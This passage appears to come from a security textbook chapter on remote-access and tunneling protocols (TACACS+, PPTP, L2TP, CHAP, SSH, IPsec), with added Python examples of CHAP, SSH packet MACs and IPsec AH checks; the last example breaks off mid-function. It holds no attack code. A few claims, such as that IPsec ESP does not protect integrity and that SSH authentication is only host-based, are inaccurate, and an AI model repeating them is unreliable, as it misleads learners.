The Terminal Access Controller Access Control System+ (TACACS+) protocol is the current generation of the TACACS family. Originally TACACS was developed by BBN Planet Corporation for MILNET, an early military network, but it has been enhanced by Cisco, which has expanded its functionality twice. The original BBN TACACS system provided a combination process of authentication and authorization. Cisco extended this to Extended Terminal Access Controller Access Control System (XTACACS), which provided for separate authentication, authorization, and accounting processes. The current generation, TACACS+, has extended attribute control and accounting processes. One of the fundamental design aspects is the separation of authentication, authorization, and accounting in this protocol. Although there is a straightforward lineage of these protocols from the original TACACS, TACACS+ is a major revision and is not backward-compatible with previous versions of the protocol series.
TACACS+ uses TCP as its transport protocol, typically operating over TCP port 49. This port is used for the login process and is reserved in RFC 3232, “Assigned Numbers,” manifested in a database from the Internet Assigned Numbers Authority (IANA). In the IANA specification, both UDP port 49 and TCP port 49 are reserved for the TACACS+ login host protocol (see Table 11.2 in the “Connection Summary” section at the end of the chapter). TACACS+ is a client/server protocol, with the client typically being a NAS and the server being a daemon process on a UNIX, Linux, or Windows server. Communications between a TACACS+ client and TACACS+ server are encrypted using a shared secret that is manually configured into each entity and is not shared over a connection. Hence, communications between a TACACS+ client (typically a NAS) and a TACACS+ server are secure, but the communications between a user (typically a PC) and the TACACS+ client are subject to compromise. This is important to note, for if the user's machine (usually a PC) is not the client (usually a NAS), then communications between the PC and the NAS are typically not encrypted and are passed in the clear.
TACACS+ Authentication
TACACS+ allows for arbitrary length and content in the authentication exchange sequence, enabling many different authentication mechanisms to be used with TACACS+ clients. Authentication is optional and is determined as a site-configurable option. When authentication is used, common forms include PPP PAP, PPP CHAP, PPP EAP, token cards, and Kerberos. The authentication process is performed using three different packet types: START, CONTINUE, and REPLY. START and CONTINUE packets originate from the client and are directed to the TACACS+ server. The REPLY packet is used to communicate from the TACACS+ server to the client. The authentication process is illustrated in Figure 11.19, and it begins with a START message from the client to the server. This message may be in response to an initiation from a PC connected to the TACACS+ client. The START message describes the type of authentication being requested (simple plaintext password, PAP, CHAP, and so on). This START message may also contain additional authentication data, such as a username and password. A START message is also sent as a response to a restart request from the server in a REPLY message. A START message always has its sequence number set to 1.
• Figure 11.19 TACACS+ communication sequence
When a TACACS+ server receives a START message, it sends a REPLY message. This REPLY message indicates whether the authentication is complete or needs to be continued. If the process needs to be continued, the REPLY message also specifies what additional information is needed. The response from a client to a REPLY message requesting additional data is a CONTINUE message. This process continues until the server has all the information needed, and the authentication process concludes with a success or failure.
TACACS+ Authorization
Authorization is defined as the granting of specific permissions based on the privileges held by the account. This generally occurs after authentication, as shown in Figure 11.19, but this is not a firm requirement. A default state of “unknown user” exists before a user is authenticated, and permissions can be determined for an unknown user. As with authentication, authorization is an optional process and may or may not be part of a site-specific operation. When it is used in conjunction with authentication, the authorization process follows the authentication process and uses the confirmed user identity as input in the decision process. The authorization process is performed using two message types: REQUEST and RESPONSE. The authorization process is performed using an authorization session consisting of a single pair of REQUEST and RESPONSE messages. The client issues an authorization REQUEST message containing a fixed set of fields enumerating the authenticity of the user or process requesting permission and a variable set of fields enumerating the services or options for which authorization is being requested. The RESPONSE message in TACACS+ is not a simple yes or no; it can also include qualifying information, such as a user time limit or IP restrictions. These limitations have important uses, such as enforcing time limits on shell access or enforcing IP access list restrictions for specific user accounts.
TACACS+ Accounting
As with the two previous services, accounting is also an optional function of TACACS+. When utilized, it typically follows the other services. Accounting in TACACS+ is defined as the process of recording what a user or process has done. Accounting can serve two important purposes:
It can be used to account for services being utilized, possibly for billing purposes.
It can be used for generating security audit trails.
TACACS+ accounting records contain several pieces of information to support these tasks. The accounting process has the information revealed in the authorization and authentication processes, so it can record specific requests by user or process. To support this functionality, TACACS+ has three types of accounting records: START, STOP, and UPDATE. Note that these are record types, not message types as earlier discussed.
Authentication Protocols
Numerous authentication protocols have been developed, used, and discarded in the brief history of computing. Some have come and gone because they did not enjoy market share, others have had security issues, and yet others have been revised and improved in newer versions. Although it's impossible and impractical to cover them all, some of the common ones follow.
L2TP and PPTP
Layer 2 Tunneling Protocol (L2TP) and Point-to-Point Tunneling Protocol (PPTP) are both OSI Layer 2 tunneling protocols. Tunneling is the encapsulation of one packet within another, which allows you to hide the original packet from view or change the nature of the network transport. This can be done for both security and practical reasons. From a practical perspective, assume that you are using TCP/IP to communicate between two machines. Your message may pass over various networks, such as an Asynchronous Transfer Mode (ATM) network, as it moves from source to destination. As the ATM protocol can neither read nor understand TCP/IP packets, something must be done to make them passable across the network. By encapsulating a packet as the payload in a separate protocol, so it can be carried across a section of a network, a mechanism called a tunnel is created. At each end of the tunnel, called the tunnel endpoints, the payload packet is read and understood. As it goes into the tunnel, you can envision your packet being placed in an envelope with the address of the appropriate tunnel endpoint on the envelope. When the envelope arrives at the tunnel endpoint, the original message (the tunnel packet's payload) is re-created, read, and sent to its appropriate next stop. The information being tunneled is understood only at the tunnel endpoints; it is not relevant to intermediate tunnel points because it is only a payload.
PPP
Point-to-Point Protocol (PPP) is an older, still widely used protocol for establishing dial-in connections over serial lines or Integrated Services Digital Network (ISDN) services. PPP has several authentication mechanisms, including PAP, CHAP, and the Extensible Authentication Protocol (EAP). These protocols are used to authenticate the peer device, not a user of the system. PPP is a standardized Internet encapsulation of IP traffic over point-to-point links, such as serial lines. The authentication process is performed only when the link is established.
Tech Tip
PPP Functions and Authentication
PPP supports three functions:
Encapsulate datagrams across serial links
Establish, configure, and test links using LCP
Establish and configure different network protocols using NCP
PPP supports two authentication protocols:
Password Authentication Protocol (PAP)
Challenge-Handshake Authentication Protocol (CHAP)
PPTP
Microsoft led a consortium of networking companies to extend PPP to enable the creation of virtual private networks (VPNs). The result was the Point-to-Point Tunneling Protocol (PPTP), a network protocol that enables the secure transfer of data from a remote PC to a server by creating a VPN across a TCP/IP network. This remote network connection can also span a public switched telephone network (PSTN) and is thus an economical way of connecting remote dial-in users to a corporate data network. The incorporation of PPTP into the Microsoft Windows product line provides a built-in secure method of remote connection using the operating system, and this has given PPTP a large marketplace footprint.
For most PPTP implementations, three computers are involved: the PPTP client, the NAS, and a PPTP server, as shown in Figure 11.20. The connection between the remote client and the network is established in stages, as illustrated in Figure 11.21. First the client makes a PPP connection to a NAS, typically an ISP. (In today's world of widely available broadband, if there is already an Internet connection, then there is no need to perform the PPP connection to the ISP.) Once the PPP connection is established, a second connection is made over the PPP connection to the PPTP server. This second connection creates the VPN connection between the remote client and the PPTP server. A typical VPN connection is one in which the user is in a hotel with a wireless Internet connection, connecting to a corporate network. This connection acts as a tunnel for future data transfers. Although these diagrams illustrate a telephone connection, this first link can be virtually any method. Common in hotels today are wired connections to the Internet. These wired connections typically are provided by a local ISP and offer the same services as a phone connection, albeit at a much higher data transfer rate.
• Figure 11.20 PPTP communication diagram
• Figure 11.21 PPTP message encapsulation during transmission
PPTP establishes a tunnel from the remote PPTP client to the PPTP server and enables encryption within this tunnel. This provides a secure method of transport. To do this and still enable routing, an intermediate addressing scheme, Generic Routing Encapsulation (GRE), is used. To establish the connection, PPTP uses communications across TCP port 1723 (see Table 11.2 in the “Connection Summary” section at the end of the chapter), so this port must remain open across the network firewalls for PPTP to be initiated. Although PPTP allows the use of any PPP authentication scheme, CHAP is used when encryption is specified, to provide an appropriate level of security. For the encryption methodology, Microsoft chose the RSA RC4 cipher, with either a 40- or 128-bit session key length, and this is OS driven. Microsoft Point-to-Point Encryption (MPPE) is an extension to PPP that enables VPNs to use PPTP as the tunneling protocol.
EAP
Extensible Authentication Protocol (EAP) is a universal authentication framework defined by RFC 3748 that is frequently used in wireless networks and point-to-point connections. Although EAP is not limited to wireless and can be used for wired authentication, it is most often used in wireless LANs. EAP is discussed in detail in Chapter 12.
CHAP
Challenge-Handshake Authentication Protocol (CHAP) is used to provide authentication across a point-to-point link using PPP. In this protocol, authentication after the link has been established is not mandatory. CHAP is designed to provide authentication periodically through the use of a challenge/response system that is sometimes described as a three-way handshake, as illustrated in Figure 11.22. The initial challenge (a randomly generated number) is sent to the client. The client uses a one-way hashing function to calculate what the response should be and then sends this back. The server compares the response to what it calculated the response should be. If they match, communication continues. If the two values don't match, then the connection is terminated. This mechanism relies on a shared secret between the two entities so that the correct values can be calculated. Microsoft has created two versions of CHAP, modified to increase the usability of CHAP across Microsoft's product line. MS-CHAP v1, defined in RFC 2433, has been deprecated and was dropped in Windows Vista. The current standard, version 2, defined in RFC 2759, was introduced with Windows 2000.
• Figure 11.22 The CHAP challenge/response sequence
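The three-way exchange of Figure 11.22 in code, as an added example rather than the book's own: the response is MD5(Identifier || secret || Challenge) exactly as RFC 1994 specifies, the secret never crosses the link, and because each challenge is random and single-use a response captured from one handshake does not verify against the next (the property PAP, described later, lacks). PPP framing is omitted and the peer name and secret are constructed.

```python
import hashlib
import hmac
import os

# Constructed shared secret for this example (not a real credential).
SECRET = b"example-chap-secret"


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 section 4.1: Response Value = MD5(Identifier || secret || Challenge Value)."""
    if not 0 <= identifier <= 255:
        raise ValueError("CHAP Identifier is a single octet")
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapAuthenticator:
    """Server side: issues challenges and checks responses. A new Identifier
    and a fresh random Challenge Value are used every time, and each challenge
    is consumed by the first response checked against it."""

    def __init__(self, secrets):
        self.secrets = secrets        # peer name -> shared secret
        self.identifier = 0
        self.outstanding = {}         # identifier -> challenge value

    def challenge(self):
        self.identifier = (self.identifier + 1) & 0xFF
        value = os.urandom(16)
        self.outstanding[self.identifier] = value
        return self.identifier, value

    def verify(self, identifier: int, name: bytes, response: bytes) -> bool:
        value = self.outstanding.pop(identifier, None)   # single use
        secret = self.secrets.get(name)
        if value is None or secret is None:
            return False
        expected = chap_response(identifier, secret, value)
        return hmac.compare_digest(expected, response)   # constant-time compare


class ChapPeer:
    """Client side: holds the secret but only ever sends a hash derived from it."""

    def __init__(self, name: bytes, secret: bytes):
        self.name, self.secret = name, secret

    def respond(self, identifier: int, challenge: bytes):
        return identifier, self.name, chap_response(identifier, self.secret, challenge)


def run_handshake(authenticator: ChapAuthenticator, peer: ChapPeer):
    """One Challenge / Response / Success-or-Failure round.
    Returns (accepted, response packet) so the packet can be reused in tests."""
    ident, value = authenticator.challenge()          # 1. Challenge
    packet = peer.respond(ident, value)               # 2. Response
    return authenticator.verify(*packet), packet      # 3. Success or Failure
```

Periodic re-authentication, which the section mentions, is simply calling run_handshake again on the established link; the old response is of no use to anyone who recorded it.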
NTLM
NT LAN Manager (NTLM) is an authentication protocol designed by Microsoft, for use with the Server Message Block (SMB) protocol. SMB is an application-level network protocol primarily used for sharing of files and printers in Windows-based networks. NTLM was designed as a replacement for the LANMAN protocol. The current version is NTLMv2, which was introduced with Windows NT 4.0 SP4. Although Microsoft has adopted the Kerberos protocol for authentication, NTLMv2 is still used when
Authenticating to a server using an IP address
Authenticating to a server that belongs to a different Active Directory forest
Authenticating to a server that doesn't belong to a domain
No Active Directory domain exists (“workgroup” or “peer-to-peer” connection)
PAP
Password Authentication Protocol (PAP) involves a two-way handshake in which the username and password are sent across the link in cleartext. PAP authentication does not provide any protection against playback and line sniffing. PAP is now a deprecated standard.
L2TP
Layer 2 Tunneling Protocol (L2TP) is also an Internet standard and came from the Layer 2 Forwarding (L2F) protocol, a Cisco initiative designed to address issues with PPTP. Whereas PPTP is designed around PPP and IP networks, L2F, and hence L2TP, is designed for use across all kinds of networks, including ATM and Frame Relay. Additionally, whereas PPTP is designed to be implemented in software at the client device, L2TP was conceived as a hardware implementation using a router or a special-purpose appliance. L2TP can be configured in software and is in Microsoft's RRAS servers, which use L2TP to create a VPN. L2TP works in much the same way as PPTP, but it opens up several items for expansion. For instance, in L2TP, routers can be enabled to concentrate VPN traffic over higher-bandwidth lines, creating hierarchical networks of VPN traffic that can be more efficiently managed across an enterprise. L2TP also has the ability to use IPsec and Data Encryption Standard (DES) as encryption protocols, providing a higher level of data security. L2TP is also designed to work with established AAA services such as RADIUS and TACACS+ to aid in user authentication, authorization, and accounting. L2TP is established via UDP port 1701, so this is an essential port to leave open across firewalls supporting L2TP traffic. Microsoft supports L2TP in Windows 2000 and above, but because of the computing power required, most implementations will use specialized hardware (such as a Cisco router).
Telnet
One of the methods to grant remote access to a system is through Telnet. Telnet is the standard terminal-emulation protocol within the TCP/IP protocol series, and it is defined in RFC 854. Telnet allows users to log in remotely and access resources as if the user had a local terminal connection. Telnet is an old protocol and offers little security. Information, including account names and passwords, is passed in cleartext over the TCP/IP connection.
Exam Tip: Telnet uses TCP port 23. Be sure to memorize the common ports used by common services for the exam.
Telnet makes its connection using TCP port 23. As Telnet is implemented on most products using TCP/IP, it is important to control access to Telnet on machines and routers when setting them up. Failure to control access by using firewalls, access lists, and other security methods, or even by disabling the Telnet daemon, is equivalent to leaving an open door for unauthorized users on a system.
SSH
Secure Shell (SSH) is a protocol series designed to facilitate secure network functions across an insecure network. SSH provides direct support for secure remote login, secure file transfer, and secure forwarding of TCP/IP and X Window System traffic. An SSH connection is an encrypted channel, providing for confidentiality and integrity protection. SSH has its origins as a replacement for the insecure Telnet application from the UNIX operating system. An original component of UNIX, Telnet allowed users to connect between systems. Although Telnet is still used today, it has some drawbacks, as discussed in the preceding section. Some enterprising University of California, Berkeley, students subsequently developed the r-commands, such as rlogin, to permit access based on the user and source system, as opposed to passing passwords. This was not perfect either, however, because when a login was required, it was still passed in the clear. This led to the development of the SSH protocol series, designed to eliminate all of the insecurities associated with Telnet, r-commands, and other means of remote access.
Exam Tip: SSH uses TCP port 22. SCP (secure copy) and SFTP (secure FTP) use SSH, so each also uses TCP port 22.
SSH opens a secure transport channel between machines by using an SSH daemon on each end. These daemons initiate contact over TCP port 22 and then communicate over higher ports in a secure mode. One of the strengths of SSH is its support for many different encryption protocols. SSH 1.0 started with RSA algorithms, but at the time they were still under patent, and this led to SSH 2.0 with extended support for Triple DES (3DES) and other encryption methods. Today, SSH can be used with a wide range of encryption protocols, including RSA, 3DES, Blowfish, International Data Encryption Algorithm (IDEA), CAST128, AES256, and others. The SSH protocol has facilities to encrypt data automatically, provide authentication, and compress data in transit. It can support strong encryption, cryptographic host authentication, and integrity protection. The authentication services are host-based and not user-based. If user authentication is desired in a system, it must be set up separately at a higher level in the OSI model. The protocol is designed to be flexible and simple, and it is designed specifically to minimize the number of round-trips between systems. The key exchange, public key, symmetric key, message authentication, and hash algorithms are all negotiated at connection time. Individual data-packet integrity is assured through the use of a message authentication code that is computed from a shared secret, the contents of the packet, and the packet sequence number. The SSH protocol consists of three major components:
Transport layer protocol Provides server authentication, confidentiality, integrity, and compression
User authentication protocol Authenticates the client to the server
Connection protocol Provides multiplexing of the encrypted tunnel into several logical channels
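The per-packet integrity check described above (a MAC over the shared secret, the packet contents, and the sequence number), as an added example that is not from the book: it follows the RFC 4253 construction MAC(key, sequence_number || packet) using HMAC-SHA-256, and shows that because each side keeps its own implicit counter, a packet that is replayed, reordered, or altered fails verification even though its tag was once valid. The integrity key is a constructed value; in SSH it is derived from the key exchange, and the packet would additionally be encrypted.

```python
import hashlib
import hmac
import struct

# Constructed integrity key for this example. In SSH the integrity key is
# derived from the key-exchange shared secret (RFC 4253 section 7.2).
INTEGRITY_KEY = b"example-ssh-integrity-key"


def packet_mac(key: bytes, seq: int, packet: bytes) -> bytes:
    """RFC 4253 section 6.4: mac = MAC(key, sequence_number || unencrypted_packet).
    sequence_number is a uint32 that is never transmitted; each side counts.
    HMAC-SHA-256 stands in for whichever MAC algorithm was negotiated."""
    return hmac.new(key, struct.pack("!I", seq) + packet, hashlib.sha256).digest()


class Sender:
    def __init__(self, key: bytes):
        self.key, self.seq = key, 0

    def send(self, packet: bytes):
        """Return (packet, tag) as it would go on the wire (encryption omitted)."""
        tag = packet_mac(self.key, self.seq, packet)
        self.seq = (self.seq + 1) & 0xFFFFFFFF      # uint32 wrap-around
        return packet, tag


class Receiver:
    def __init__(self, key: bytes):
        self.key, self.seq = key, 0

    def receive(self, packet: bytes, tag: bytes) -> bool:
        """Accept only if the tag verifies under the receiver's own expected
        sequence number. A failure means the connection must be torn down:
        the counter is not advanced, so nothing later can be slipped in."""
        expected = packet_mac(self.key, self.seq, packet)
        if not hmac.compare_digest(expected, tag):
            return False
        self.seq = (self.seq + 1) & 0xFFFFFFFF
        return True
```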
SSH is very popular in the UNIX environment, and it is actively used as a method of establishing VPNs across public networks. Because all communications between the two machines are encrypted at the OSI application layer by the two SSH daemons, this leads to the ability to build very secure solutions and even solutions that defy the ability of outside services to monitor. As SSH is a standard protocol series with connection parameters established via TCP port 22, different vendors can build differing solutions that can still interoperate.
Tech Tip
RDP
Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol designed to provide a graphical connection to another computer. The computer requesting the connection has RDP client software (built into Windows), and the target uses an RDP server. This software has been available for many versions of Windows and was formerly called Terminal Services. Client and server versions also exist for Linux platforms. RDP uses TCP and UDP ports 3389, so if RDP is desired, these ports need to be open on the firewall.
Although Windows Server implementations of SSH exist, this has not been a popular protocol in the Windows environment from a server perspective. The development of a wide array of commercial SSH clients for the Windows platform indicates the marketplace strength of interconnection from desktop PCs to UNIX-based servers utilizing this protocol.
FTP/FTPS/SFTP
One of the methods of transferring files between machines is through the use of the File Transfer Protocol (FTP). FTP is a plaintext protocol that operates by communicating over TCP between a client and a server. The client initiates a transfer with an FTP request to the server's TCP port 21. This is the control connection, and this connection remains open over the duration of the file transfer. The actual data transfer occurs on a negotiated data transfer port, typically a high-order port number. FTP was not designed to be a secure method of transferring files. If a secure method is desired, then using FTPS or SFTP is best. FTPS is the use of FTP over an SSL/TLS secured channel. This can be done either in explicit mode, where an AUTH TLS command is issued, or in implicit mode, where the transfer occurs over TCP port 990 for the control channel and TCP port 989 for the data channel. SFTP is not FTP per se, but rather a completely separate Secure File Transfer Protocol as defined by an IETF Draft, the latest of which, version 6, expired in July 2007, but has been incorporated into products in the marketplace.
Exam Tip: FTP uses TCP port 21 as a control channel and TCP port 20 as a typical active mode data port, as some firewalls are set to block ports above 1024.
It is also possible to run FTP over SSH, as later versions of SSH allow securing of channels such as the FTP control channel; this has also been referred to as Secure FTP. This leaves the data channel unencrypted, a problem that has been solved in version 3.0 of SSH, which supports FTP commands. The challenge of encrypting the FTP data communications is that the mutual port agreement must be opened on the firewall, and for security reasons, high-order ports that are not explicitly defined are typically secured. Because of this challenge, Secure Copy (SCP) is often a more desirable alternative to SFTP when using SSH.
VPNs
A virtual private network (VPN) is a secure virtual network built on top of a physical network. The security of a VPN lies in the encryption of packet contents between the endpoints that define the VPN. The physical network upon which a VPN is built is typically a public network, such as the Internet. Because the packet contents between VPN endpoints are encrypted, to an outside observer on the public network, the communication is secure, and depending on how the VPN is set up, security can even extend to the two communicating parties' machines. Virtual private networking is not a protocol per se, but rather a method of using protocols to achieve a specific objective—secure communications—as shown in Figure 11.23. A user who wants to have a secure communication channel with a server across a public network can set up two intermediary devices, VPN endpoints, to accomplish this task. The user can communicate with his endpoint, and the server can communicate with its endpoint. The two endpoints then communicate across the public network. VPN endpoints can be software solutions, routers, or specific servers set up for specific functionality. This implies that VPN services are set up in advance and are not something negotiated on-the-fly.
• Figure 11.23 VPN service over an Internet connection
A typical use of VPN services is a user accessing a corporate data network from a home PC across the Internet. The employee installs VPN software from work on a home PC. This software is already configured to communicate with the corporate network's VPN endpoint; it knows the location, the protocols that will be used, and so on. When the home user wants to connect to the corporate network, she connects to the Internet and then starts the VPN software. The user can then log in to the corporate network by using an appropriate authentication and authorization methodology. The sole purpose of the VPN connection is to provide a private connection between the machines, which encrypts any data sent between the home user's PC and the corporate network. Identification, authorization, and all other standard functions are accomplished with the standard mechanisms for the established system. VPNs can use many different protocols to offer a secure method of communicating between endpoints. Common methods of encryption on VPNs include PPTP, IPsec, SSH, and L2TP, all of which are discussed in this chapter. The key is that both endpoints know the protocol and share a secret. All of this necessary information is established when the VPN is set up. At the time of use, the VPN only acts as a private tunnel between the two points and does not constitute a complete security solution.
IPsec
Internet Protocol Security (IPsec) is a set of protocols developed by the IETF to securely exchange packets at the network layer (Layer 3) of the OSI model (RFCs 2401–2412). Although these protocols work only in conjunction with IP networks, once an IPsec connection is established, it is possible to tunnel across other networks at lower levels of the OSI model. The set of security services provided by IPsec occurs at the network layer of the OSI model, so higher-layer protocols, such as TCP, UDP, Internet Control Message Protocol (ICMP), Border Gateway Protocol (BGP), and the like, are not functionally altered by the implementation of IPsec services. The IPsec protocol series has a sweeping array of services it is designed to provide, including but not limited to access control, connectionless integrity, traffic-flow confidentiality, rejection of replayed packets, data security (encryption), and data-origin authentication. IPsec has two defined methods—transport and tunneling—that provide different levels of security. IPsec also has three modes of connection: host-to-server, server-to-server, and host-to-host. The transport method encrypts only the data portion of a packet, thus enabling an outsider to see source and destination IP addresses. The transport method protects the higher-level protocols associated with a packet and protects the data being transmitted but allows knowledge of the transmission itself. Protection of the data portion of a packet is referred to as content protection.
Exam Tip: In transport mode (end-to-end), security of packet traffic is provided by the endpoint computers. In tunnel mode (portal-to-portal), security of packet traffic is provided between endpoint node machines in each network and not at the terminal host machines.
Tunneling provides encryption of source and destination IP addresses, as well as of the data itself. This provides the greatest security, but it can be done only between IPsec servers (or routers) because the final destination needs to be known for delivery. Protection of the header information is known as context protection. It is possible to use both methods at the same time, such as using transport within one's own network to reach an IPsec server, which then tunnels to the target server's network, connecting to an IPsec server there, and then using the transport method from the target network's IPsec server to the target host.
Security Associations
A security association (SA) is a formal manner of describing the necessary and sufficient portions of the IPsec protocol series to achieve a specific level of protection. Because many options exist, both communicating parties must agree on the use of the protocols that are available, and this agreement is referred to as a security association. SAs exist both for integrity-protecting systems and confidentiality-protecting systems. In each IPsec implementation, a security association database (SAD) defines parameters associated with each SA. The SA is a one-way (simplex) association, and if two-way communication security is desired, two SAs are used—one for each direction.
Exam Tip: A security association is a logical set of security parameters designed to facilitate the sharing of information between entities.
IPsec Configurations
Four basic configurations can be applied to machine-to-machine connections using IPsec. The simplest is a host-to-host connection between two machines, as shown in Figure 11.24. In this case, the Internet is not a part of the SA between the machines. If bidirectional security is desired, two SAs are used. The SAs are effective from host to host.
• Figure 11.24 A host-to-host connection between two machines
The second case places two security devices in the stream, relieving the hosts of the calculation and encapsulation duties. These two gateways have an SA between them. The network is assumed to be secure from each machine to its gateway, and no IPsec is performed across these hops. Figure 11.25 shows the two security gateways with a tunnel across the Internet, although either tunnel or transport mode could be used.
• Figure 11.25 Two security gateways with a tunnel across the Internet
The third case combines the first two. A separate SA exists between the gateway devices, but an SA also exists between hosts. This could be considered a tunnel inside a tunnel, as shown in Figure 11.26.
• Figure 11.26 A tunnel inside a tunnel
Remote users commonly connect through the Internet to an organization's network. The network has a security gateway through which it secures traffic to and from its servers and authorized users. In the last case, illustrated in Figure 11.27, the user establishes an SA with the security gateway and then a separate SA with the desired server, if required. This can be done using software on a remote laptop and hardware at the organization's network.
• Figure 11.27 Tunnel from host to gateway
Windows can act as an IPsec server, as can routers and other servers. The primary issue is CPU usage and where the computing power should be implanted. This consideration has led to the rise of IPsec appliances, which are hardware devices that perform the IPsec function specifically for a series of communications. Depending on the number of connections, network bandwidth, and so on, these devices can be inexpensive for small office or home office use or quite expensive for large, enterprise-level implementations.
IPsec Security
IPsec uses two protocols to provide traffic security:
Authentication Header (AH) A header added to a packet for the purposes of integrity checking
Encapsulating Security Payload (ESP) A method of encrypting the data portion of a datagram to provide confidentiality
For key management and exchange, three protocols exist:
Internet Security Association and Key Management Protocol (ISAKMP)
Oakley
Secure Key Exchange Mechanism for Internet (SKEMI)
These key management protocols can be collectively referred to as Internet Key Management Protocol (IKMP) or Internet Key Exchange (IKE). IPsec does not define specific security algorithms, nor does it require specific methods of implementation. IPsec is an open framework that allows vendors to implement existing industry-standard algorithms suited for specific tasks. This flexibility is key in IPsec's ability to offer a wide range of security functions. IPsec allows several security technologies to be combined into a comprehensive solution for network-based confidentiality, integrity, and authentication. IPsec uses the following:
Exam Tip: IPsec AH protects integrity, but it does not provide privacy. IPsec ESP provides confidentiality, but it does not protect integrity of the packet. To cover both privacy and integrity, both headers can be used at the same time.
Diffie-Hellman key exchange between peers on a public network
Public key signing of Diffie-Hellman key exchanges to guarantee identity and avoid man-in-the-middle attacks
Bulk encryption algorithms, such as IDEA and 3DES, for encrypting data
Keyed hash algorithms, such as HMAC, and traditional hash algorithms, such as MD5 and SHA-1, for packet-level authentication
Digital certificates to act as digital ID cards between parties
To provide traffic security, two header extensions have been defined for IP datagrams. The AH, when added to an IP datagram, ensures the integrity of the data and also the authenticity of the data's origin. By protecting the nonchanging elements in the IP header, the AH protects the IP address, which enables data-origin authentication. The ESP provides security services for the higher-level protocol portion of the packet only, not the IP header. AH and ESP can be used separately or in combination, depending on the level and types of security desired. Both also work with the transport and tunnel modes of IPsec protocols. In transport mode, the two communication endpoints provide security primarily for the upper-layer protocols. The cryptographic endpoints, where encryption and decryption occur, are located at the source and destination of the communication channel. When AH is in transport mode, the original IP header is exposed, but its contents are protected via the AH block in the packet, as illustrated in Figure 11.28. When AH is employed in tunnel mode, portions of the outer IP header are given the same header protection that occurs in transport mode, with the entire inner packet receiving protection. This is illustrated in Figure 11.29. The use of tunnel mode allows easier crossing of firewalls, for without it, specific firewall rules would be needed to pass the modified transport packet header.
• Figure 11.28 IPsec use of AH in transport mode
• Figure 11.29 IPsec use of AH in tunnel mode
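The AH layouts of Figures 11.28 and 11.29 can be modelled directly. The following Python is an added example, not code from the book: it builds an IPv4 packet with an Authentication Header in transport mode and in tunnel mode, computes the integrity check value (ICV) with HMAC-SHA1-96 over the nonchanging header fields (mutable fields such as TTL are zeroed first, as the AH specification, RFC 2402 and later RFC 4302, requires), and shows that a router decrementing the outer TTL leaves the packet valid while a rewritten source address, or any change to the encapsulated inner header in tunnel mode, is detected. The key, SPI, addresses and payload are constructed values.

```python
import hashlib
import hmac
import struct

# Constructed demo values, not from the book: a shared AH key and an SPI.
AH_KEY = b"constructed-demo-ah-key-0123456789"
AH_SPI = 0x00001000
IPPROTO_IPIP = 4    # next header value for an encapsulated IPv4 packet (tunnel mode)
IPPROTO_TCP = 6
IPPROTO_AH = 51
ICV_LEN = 12        # HMAC-SHA1-96 truncates the 20-byte HMAC to 96 bits

def ipv4_header(src, dst, proto, total_len, ttl=64):
    """Minimal 20-byte IPv4 header (no options); checksum left at 0 for the demo."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, ttl, proto, 0, src, dst)

def zero_mutable_fields(ip_hdr):
    """Zero the fields a router may legitimately change in flight (TOS, flags/fragment
    offset, TTL, header checksum) so the ICV covers only the nonchanging elements of
    the header; that is what gives AH its data-origin authentication."""
    h = bytearray(ip_hdr)
    h[1] = 0                 # TOS / DSCP / ECN
    h[6:8] = b"\x00\x00"     # flags + fragment offset
    h[8] = 0                 # TTL
    h[10:12] = b"\x00\x00"   # header checksum
    return bytes(h)

def ah_fixed(next_header, seq):
    """The 12 fixed bytes of the AH: next header, payload length (in 32-bit words
    minus 2), reserved, SPI, sequence number. The ICV follows these bytes."""
    payload_len = (12 + ICV_LEN) // 4 - 2
    return struct.pack("!BBHII", next_header, payload_len, 0, AH_SPI, seq)

def compute_icv(key, ip_hdr, ah_hdr, protected):
    """ICV = HMAC-SHA1-96 over (IP header with mutable fields zeroed) + AH with its
    own ICV field zeroed + everything after the AH."""
    data = zero_mutable_fields(ip_hdr) + ah_hdr + b"\x00" * ICV_LEN + protected
    return hmac.new(key, data, hashlib.sha1).digest()[:ICV_LEN]

def ah_transport(key, src, dst, seq, payload, ttl=64):
    """Transport mode: the original IP header stays in the clear, AH is inserted after
    it, and the ICV covers that header's immutable fields plus the upper-layer payload."""
    total_len = 20 + 12 + ICV_LEN + len(payload)
    ip_hdr = ipv4_header(src, dst, IPPROTO_AH, total_len, ttl)
    ah_hdr = ah_fixed(IPPROTO_TCP, seq)
    icv = compute_icv(key, ip_hdr, ah_hdr, payload)
    return ip_hdr + ah_hdr + icv + payload

def ah_tunnel(key, gw_src, gw_dst, seq, inner_packet, ttl=64):
    """Tunnel mode: a new outer IP header (gateway addresses) plus AH wrap the whole
    inner packet, so the inner header, its TTL included, is entirely protected."""
    total_len = 20 + 12 + ICV_LEN + len(inner_packet)
    outer = ipv4_header(gw_src, gw_dst, IPPROTO_AH, total_len, ttl)
    ah_hdr = ah_fixed(IPPROTO_IPIP, seq)
    icv = compute_icv(key, outer, ah_hdr, inner_packet)
    return outer + ah_hdr + icv + inner_packet

def verify_ah(key, packet):
    """Receiver side: recompute the ICV the same way and compare in constant time."""
    ip_hdr, ah_hdr = packet[:20], packet[20:32]
    icv, protected = packet[32:32 + ICV_LEN], packet[32 + ICV_LEN:]
    return hmac.compare_digest(icv, compute_icv(key, ip_hdr, ah_hdr, protected))

def patch(packet, offset, new_bytes):
    """Copy of packet with new_bytes written at offset (simulates an in-flight change)."""
    return packet[:offset] + new_bytes + packet[offset + len(new_bytes):]

def transport_mode_demo():
    """Returns (original_ok, ttl_decremented_ok, source_spoofed_ok)."""
    host_a, host_b = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])
    pkt = ah_transport(AH_KEY, host_a, host_b, seq=1, payload=b"constructed TCP segment")
    ttl_hop = patch(pkt, 8, bytes([pkt[8] - 1]))       # a router decrementing TTL is allowed
    spoofed = patch(pkt, 12, bytes([192, 168, 1, 1]))  # rewriting the source address is not
    return verify_ah(AH_KEY, pkt), verify_ah(AH_KEY, ttl_hop), verify_ah(AH_KEY, spoofed)

def tunnel_mode_demo():
    """Returns (original_ok, outer_ttl_decremented_ok, inner_ttl_changed_ok)."""
    host_a, host_b = bytes([10, 0, 0, 1]), bytes([10, 1, 0, 2])
    gw_a, gw_b = bytes([203, 0, 113, 1]), bytes([198, 51, 100, 1])
    payload = b"constructed TCP segment"
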